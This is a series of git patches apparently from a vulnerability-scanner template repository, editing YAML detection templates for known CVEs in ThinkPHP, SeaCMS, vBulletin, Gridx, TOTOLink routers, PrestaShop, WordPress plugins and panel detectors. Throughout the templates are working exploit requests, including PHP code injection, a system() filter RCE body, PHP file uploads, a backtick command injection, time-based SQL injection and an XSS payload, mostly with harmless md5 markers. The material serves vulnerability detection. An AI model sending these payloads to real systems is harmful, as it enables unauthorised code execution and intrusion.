{{Hostname}} + Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 + + - | + GET /wp-content/uploads/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - contains(all_headers_3, "text/html") + - status_code_3 == 200 + - contains(body_3, 'FILE-UPLOAD-SUCCESS') + + condition: and + + extractors: + - type: regex + name: filename + group: 1 + regex: + - 'wordpress\\\/wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' + internal: true \ No newline at end of file From 8152f709e1159956ae6b67eae229d090a8680ca2 Mon Sep 17 00:00:00 2001 From: jkennedyvz <65985482+jkennedyvz@users.noreply.github.com> Date: Sun, 30 Oct 2022 11:24:25 -0700 Subject: [PATCH 0048/1415] removing duplicate/erroneous match condition --- cves/2021/CVE-2021-44451.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml index 9ecfb418b6..a836701dfa 100644 --- a/cves/2021/CVE-2021-44451.yaml +++ b/cves/2021/CVE-2021-44451.yaml @@ -54,14 +54,6 @@ requests: matchers-condition: and matchers: - - type: word - part: body - condition: and - words: - - 'Redirecting...' - - '

Redirecting...' - - type: word part: header words: @@ -72,3 +64,4 @@ requests: - 302 # Enhanced by mp on 2022/03/02 +# jkennedy 2022/10/30 Removed dupicate/erroneous match and verified on version 1.5.2 \ No newline at end of file From 6cefad4ad9bbb6e740d672359c02b3d84c626f8f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Nov 2022 20:54:27 +0530 Subject: [PATCH 0049/1415] Update CVE-2018-7700.yaml --- cves/2018/CVE-2018-7700.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml index 5e1a7ce88a..dda8797e43 100644 --- a/cves/2018/CVE-2018-7700.yaml +++ b/cves/2018/CVE-2018-7700.yaml @@ -19,7 +19,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}" matchers-condition: and matchers: @@ -27,9 +27,7 @@ requests: - type: word part: body words: - - "phpinfo" - - "PHP Version" - condition: and + - "4cc32a3a81d2bb37271934a48ce4468a" - type: status status: From 471f8534d7450c4d2cadeae1be72da5ba3d3018d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Nov 2022 20:56:11 +0530 Subject: [PATCH 0050/1415] Update CVE-2021-37704.yaml --- cves/2021/CVE-2021-37704.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index b5147f128a..c5f5f6eb0f 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -1,7 +1,7 @@ id: CVE-2021-37704 info: - name: phpinfo Resource Exposure + name: phpfastcache - phpinfo Resource Exposure author: whoever severity: medium description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. @@ -15,7 +15,7 @@ info: cvss-score: 4.3 cve-id: CVE-2021-37704 cwe-id: CWE-668 - tags: cve,cve2021,exposure,phpfastcache,phpinfo + tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork requests: - method: GET @@ -23,6 +23,7 @@ requests: - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 2496b86eea4c726c2821491c9b0393fcb35d00dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:39:28 +0530 Subject: [PATCH 0051/1415] Update thinkphp-509-information-disclosure.yaml --- .../thinkphp/thinkphp-509-information-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index 4fd517fcbe..bbabf0d73e 100644 --- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -17,10 +17,10 @@ requests: matchers-condition: and matchers: - type: word - condition: and words: - "SQLSTATE" - "XPATH syntax error" + condition: and - type: status status: From 2a580638a3a5cd0bf9a5f2516c54211edfe5743d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:47:41 +0530 Subject: [PATCH 0052/1415] Update thinkphp-501-rce.yaml --- vulnerabilities/thinkphp/thinkphp-501-rce.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml index 6fff93da1e..d7a78781c8 100644 --- a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -5,6 +5,8 @@ info: author: lark-lab severity: critical description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to execute arbitrary code via the 's' parameter. + reference: + - https://www.exploit-db.com/exploits/46150 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 @@ -15,17 +17,16 @@ requests: - method: POST path: - "{{BaseURL}}/?s=index/index/index" - body: "s=phpinfo()&_method=__construct&filter=assert" + body: "s=echo%20thinkphp%20%7C%20rev&_method=__construct&method&filter[]=system" headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body words: - - "PHP Extension" - - "PHP Version" - condition: and + - "phpkniht" - type: status status: From 81123b89eaefe83faaada120f836cf8bdfad7cb2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:50:37 +0530 Subject: [PATCH 0053/1415] Update seacms-rce.yaml --- vulnerabilities/other/seacms-rce.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index 54d215da6b..ed5688fc37 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -13,16 +13,15 @@ requests: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' - body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" + body: "searchtype=5&order=}{end if} {if:1)echo%20md5%28%22seacms%22%29%3Bif(1}{end if}" matchers-condition: and matchers: - type: word - words: - - "phpinfo" - - "PHP Version" - condition: and part: body + words: + - "b1e597fa44dfd7669966bfab04eeb8ea" + - type: status status: - 200 From 69596d534193bf1064d8987328db4b7c9bbe82fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:52:01 +0530 Subject: [PATCH 0054/1415] Update seacms-rce.yaml --- vulnerabilities/other/seacms-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index ed5688fc37..b4ebe60eb3 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -13,7 +13,7 @@ requests: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' - body: "searchtype=5&order=}{end if} {if:1)echo%20md5%28%22seacms%22%29%3Bif(1}{end if}" + body: "searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}" matchers-condition: and matchers: From f62d4f09aa3d9a8ce5d640ab4e2ef6f74a0b98bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:54:27 +0530 Subject: [PATCH 0055/1415] Update core-chuangtian-cloud-rce.yaml --- vulnerabilities/other/core-chuangtian-cloud-rce.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index baf19d8ef4..ec3d053cdc 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: rce,fileupload,intrusive + tags: rce,fileupload,intrusive,cloud,chuangtian requests: - raw: @@ -24,21 +24,21 @@ requests: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv ------WebKitFormBoundaryfcKRltGv - Content-Disposition: form-data; name="file"; filename="test.php" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: image/avif - + ------WebKitFormBoundaryfcKRltGv-- - | - GET /Upload/test/test.php HTTP/1.1 + GET /Upload/test/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - - 'contains(body_2, "PHP Version")' + - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")' - 'status_code_2 == 200' condition: and From 0ab97b9f7252044926eaf2e059501253f18462bb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 18:57:28 +0530 Subject: [PATCH 0056/1415] Update CVE-2020-19625.yaml --- cves/2020/CVE-2020-19625.yaml | 21 ++++++++------------- 1 file changed, 8 insertions(+), 13 deletions(-) diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index eaad72228d..e6590a5113 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -7,9 +7,9 @@ info: description: | Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. reference: + - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf - https://github.com/oria/gridx/issues/433 - https://nvd.nist.gov/vuln/detail/CVE-2020-19625 - - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -19,23 +19,18 @@ info: requests: - method: GET path: - - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" + - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B" matchers-condition: and matchers: + + - type: word + part: body + words: + - "6ca86c2c17047c14437f55c42c801c10" + - type: status status: - 200 - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - extractors: - - type: regex - part: body - group: 1 - regex: - - '

PHP Version ([0-9.]+)<\/h1>' # Enhanced by mp on 2022/04/27 From bf1c0fcfaa26d4103e88c10529ed0dc4e598f24c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 19:02:46 +0530 Subject: [PATCH 0057/1415] Update CVE-2019-16759.yaml --- cves/2019/CVE-2019-16759.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 936703b5c7..35190e4a97 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -15,7 +15,10 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16759 cwe-id: CWE-94 - tags: rce,kev,seclists,cve,cve2019,vbulletin + metadata: + verified: true + shodan-query: http.component:"vBulletin" + tags: cve,cve2019,rce,kev,seclists,vbulletin requests: - raw: @@ -24,15 +27,15 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B matchers-condition: and matchers: + + - type: word + words: + - "addcc9f9f2f40e2e6aca3079b73d9d17" + - type: status status: - 200 - - type: word - words: - - "PHP Version" - -# Enhanced by mp on 2022/03/29 From c2b70fac8cf4f6d0e2dd2c077e69534b3ffb9730 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Nov 2022 19:10:01 +0530 Subject: [PATCH 0058/1415] Update CVE-2022-0885.yaml --- cves/2022/CVE-2022-0885.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-0885.yaml b/cves/2022/CVE-2022-0885.yaml index e8f91f6fb6..fb41864e26 100644 --- a/cves/2022/CVE-2022-0885.yaml +++ b/cves/2022/CVE-2022-0885.yaml @@ -30,6 +30,7 @@ requests: words: - "PHP Extension" - "PHP Version" + - " Date: Fri, 4 Nov 2022 00:35:09 +0530 Subject: [PATCH 0059/1415] Update and rename keycloak-admin-panel.yaml to key-cloak-admin-panel.yaml --- .../{keycloak-admin-panel.yaml => key-cloak-admin-panel.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{keycloak-admin-panel.yaml => key-cloak-admin-panel.yaml} (95%) diff --git a/exposed-panels/keycloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml similarity index 95% rename from exposed-panels/keycloak-admin-panel.yaml rename to exposed-panels/key-cloak-admin-panel.yaml index 8f2f2b35c7..092f7f544a 100644 --- a/exposed-panels/keycloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -1,4 +1,4 @@ -id: keycloak-admin-panel +id: key-cloak-admin-panel info: name: Keycloak Admin Panel From 70cb7c808f0735c15b398ac35e920227e1488eb0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 4 Nov 2022 02:05:02 +0530 Subject: [PATCH 0060/1415] Update sophos-fw-version-detect.yaml --- exposed-panels/sophos-fw-version-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml index 0ebf84815f..e8a1e83a06 100644 --- a/exposed-panels/sophos-fw-version-detect.yaml +++ b/exposed-panels/sophos-fw-version-detect.yaml @@ -30,4 +30,4 @@ requests: - type: regex part: body regex: - - "(?m) Date: Fri, 4 Nov 2022 12:37:38 +0530 Subject: [PATCH 0061/1415] Update CVE-2022-1952.yaml --- cves/2022/CVE-2022-1952.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-1952.yaml b/cves/2022/CVE-2022-1952.yaml index 10c3f61ffd..1bcd53e74a 100644 --- a/cves/2022/CVE-2022-1952.yaml +++ b/cves/2022/CVE-2022-1952.yaml @@ -40,7 +40,7 @@ requests: Content-Disposition: form-data; name="driver_license_image2"; filename="evil.php" Content-Type: application/octet-stream - + --------------------------98efee55508c5059-- @@ -59,8 +59,8 @@ requests: dsl: - contains(all_headers_3, "text/html") - status_code_3 == 200 - - contains(body_3, 'FILE-UPLOAD-SUCCESS') - + - contains(body_1, 'success\":true') + - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9') condition: and extractors: @@ -68,5 +68,5 @@ requests: name: filename group: 1 regex: - - 'wordpress\\\/wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' - internal: true \ No newline at end of file + - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' + internal: true From 7d6b284f12b88c6eb1537efb4b5bfff886da5388 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 5 Nov 2022 14:02:14 +0700 Subject: [PATCH 0062/1415] feat: major change on led-imediacloud template --- exposed-panels/led-imediacloud-panel.yaml | 26 ------------------ exposed-panels/xibocms-login.yaml | 33 +++++++++++++++++++++++ 2 files changed, 33 insertions(+), 26 deletions(-) delete mode 100644 exposed-panels/led-imediacloud-panel.yaml create mode 100644 exposed-panels/xibocms-login.yaml diff --git a/exposed-panels/led-imediacloud-panel.yaml b/exposed-panels/led-imediacloud-panel.yaml deleted file mode 100644 index 1ee6373e9e..0000000000 --- a/exposed-panels/led-imediacloud-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: led-imediacloud-panel - -info: - name: LEDiMediaCloud Panel Detect - author: ritikchaddha - severity: info - metadata: - verified: true - shodan-query: http.html:"LEDiMediaCloud" - tags: panel,led,mediacloud - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'LEDiMediaCloud' - - - type: status - status: - - 200 diff --git a/exposed-panels/xibocms-login.yaml b/exposed-panels/xibocms-login.yaml new file mode 100644 index 0000000000..74f6e8be70 --- /dev/null +++ b/exposed-panels/xibocms-login.yaml @@ -0,0 +1,33 @@ +id: xibocms-login + +info: + name: Xibo CMS Login Panel Detect + author: ritikchaddha,daffainfo + severity: info + metadata: + verified: true + shodan-query: http.html:"https://github.com/xibosignage/xibo-cms" + tags: panel,xibocms + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+) | Date: Sat, 5 Nov 2022 21:21:49 +0900 Subject: [PATCH 0063/1415] Create CVE-2022-25082 TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. Signed-off-by: GwanYeong Kim --- cves/2022/CVE-2022-25082.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-25082.yaml diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml new file mode 100644 index 0000000000..73b7b3ecec --- /dev/null +++ b/cves/2022/CVE-2022-25082.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-25082 + +info: + name: TOTOLink - Unauthenticated Command Injection + author: gy741 + severity: critical + description: | + TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-25082 + - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25082 + cwe-id: CWE-77 + tags: totolink,cve,cve2022,router,unauth,rce + +requests: + - raw: + - | + GET /cgi-bin/downloadFlile.cgi?payload=`ls>../{{randstr}}` HTTP/1.1 + Host: {{Hostname}} + + - | + GET /{{randstr}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ".sh" + - ".cgi" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/11/05 From 3328478176c3ba48cb46a5d036af7d6ab577cd6f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 6 Nov 2022 13:06:38 +0700 Subject: [PATCH 0064/1415] feat: added lansweeper login --- exposed-panels/lansweeper-login.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml index 727a06efff..1b754dbf1d 100644 --- a/exposed-panels/lansweeper-login.yaml +++ b/exposed-panels/lansweeper-login.yaml @@ -10,17 +10,21 @@ requests: - method: GET path: - "{{BaseURL}}/login.aspx" - - "{{BaseURL}}/favicon.ico" - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word name: login words: - "Lansweeper - Login" - - type: dsl - name: favicon - dsl: - - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" \ No newline at end of file + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"' From b991a804d8601bc2fa37b8d1714d90f9e82c3c76 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Sun, 6 Nov 2022 13:41:14 +0100 Subject: [PATCH 0065/1415] Add CVE-2008-6465 --- cves/2008/CVE-2008-6465.yaml | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2008/CVE-2008-6465.yaml diff --git a/cves/2008/CVE-2008-6465.yaml b/cves/2008/CVE-2008-6465.yaml new file mode 100644 index 0000000000..30c0cfd510 --- /dev/null +++ b/cves/2008/CVE-2008-6465.yaml @@ -0,0 +1,37 @@ +id: CVE-2008-6465 + +info: + name: Parallels H-Sphere - Cross Site Scripting + author: edoardottt + severity: medium + description: | + Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 + classification: + cve-id: CVE-2008-6465 + tags: xss,parallels,hsphere,cve2008 + +requests: + - raw: + - | + @timeout: 10s + GET /webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "\" onfocus=alert(document.domain); autofocus" + - "-at--psoft.net>" \ No newline at end of file From ad4295d97a04cf8e172c17fd98b6a7ad83d7b0c6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 7 Nov 2022 14:08:00 +0700 Subject: [PATCH 0066/1415] fix: remove LANCOM 1790VA-4G matcher to fix false negative --- exposed-panels/lancom-router-panel.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml index 9e15b91dda..3f5f2bcd24 100644 --- a/exposed-panels/lancom-router-panel.yaml +++ b/exposed-panels/lancom-router-panel.yaml @@ -2,7 +2,7 @@ id: lancom-router-panel info: name: Lancom Router Panel - author: __Fazal + author: __Fazal,daffainfo severity: info tags: panel,lancom,router @@ -18,5 +18,8 @@ requests: - 200 - type: word + part: body words: - - "LANCOM 1790VA-4G" + - 'alt="LANCOM Systems GmbH"' + - 'class="outside_device_string_common">LANCOM' + condition: and From 0b139469a59b796618080746e160594ba0d3b7aa Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 8 Nov 2022 11:09:03 -0500 Subject: [PATCH 0067/1415] Create git-logs-exposure-detect.yaml --- exposures/logs/git-logs-exposure-detect.yaml | 30 ++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/logs/git-logs-exposure-detect.yaml diff --git a/exposures/logs/git-logs-exposure-detect.yaml b/exposures/logs/git-logs-exposure-detect.yaml new file mode 100644 index 0000000000..22712c0cfa --- /dev/null +++ b/exposures/logs/git-logs-exposure-detect.yaml @@ -0,0 +1,30 @@ +id: git-logs-exposure-detect + +info: + name: Git logs Exposure + author: tess + severity: high + metadata: + verified: true + tags: logs,detect,git,exposed + +requests: + - method: GET + path: + - "{{BaseURL}}/.git/" + + stop-at-first-match: true + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "403 Forbidden" + - "You do not have permission to access /.git/" + condition: and + + - type: status + status: + - 403 From d9dcf035ffa9cd21c0b2049d2b0ebc09606a9c85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 11:28:01 +0530 Subject: [PATCH 0068/1415] Update cves/2021/CVE-2021-3110.yaml Co-authored-by: Toufik Airane --- cves/2021/CVE-2021-3110.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index a094975361..0d8e38678e 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -11,16 +11,16 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)" + - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(7)))xoOt)" + matchers-condition: and matchers: - type: word words: - "average_grade" - - "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)" - condition: and part: body - - - type: status - status: + + - type: dsl + dsl: + - 'duration>=7' - 200 \ No newline at end of file From b089b765052fe867f7c9650631263c0fb52696b6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 11:30:08 +0530 Subject: [PATCH 0069/1415] Update CVE-2021-3110.yaml --- cves/2021/CVE-2021-3110.yaml | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index 0d8e38678e..5bed960a46 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -11,16 +11,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(7)))xoOt)" + - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt)" - matchers-condition: and matchers: - - type: word - words: - - "average_grade" - part: body - - type: dsl dsl: - - 'duration>=7' - - 200 \ No newline at end of file + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "average_grade")' + condition: and From 7b462eb0bc417599699c9cc2202d495c4bea0f53 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 11:33:04 +0530 Subject: [PATCH 0070/1415] Update CVE-2021-3110.yaml --- cves/2021/CVE-2021-3110.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index 5bed960a46..5d5be392ff 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -1,11 +1,17 @@ id: CVE-2021-3110 info: - name: prestshop CMS SQL Injection + name: PrestaShop 1.7.7.0 SQL Injection author: Jaimin Gondaliya severity: critical - description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + description: | + The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e + - https://www.exploit-db.com/exploits/49410 + metadata: + verified: true tags: cve,cve2021,sqli,prestshop requests: @@ -18,5 +24,6 @@ requests: dsl: - 'duration>=6' - 'status_code == 200' + - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and From 2f3d3d323e5a66a75def8eb72b5fedf14c786377 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 12:05:02 +0530 Subject: [PATCH 0071/1415] Update CVE-2020-13121.yaml --- cves/2020/CVE-2020-13121.yaml | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-13121.yaml b/cves/2020/CVE-2020-13121.yaml index 2d44d41e5f..01629177cf 100644 --- a/cves/2020/CVE-2020-13121.yaml +++ b/cves/2020/CVE-2020-13121.yaml @@ -16,10 +16,18 @@ info: tags: cve,cve2020,redirect,submitty,oos requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + - raw: + - | + POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/authentication/login + user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login + + cookie-reuse: true + matchers-condition: and matchers: - type: regex regex: From 6e4633ffa1ff64d3c0cb3636380f9d96f9e9a07a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Nov 2022 13:34:16 +0530 Subject: [PATCH 0072/1415] Update lancom-router-panel.yaml --- exposed-panels/lancom-router-panel.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml index 3f5f2bcd24..549f4aa084 100644 --- a/exposed-panels/lancom-router-panel.yaml 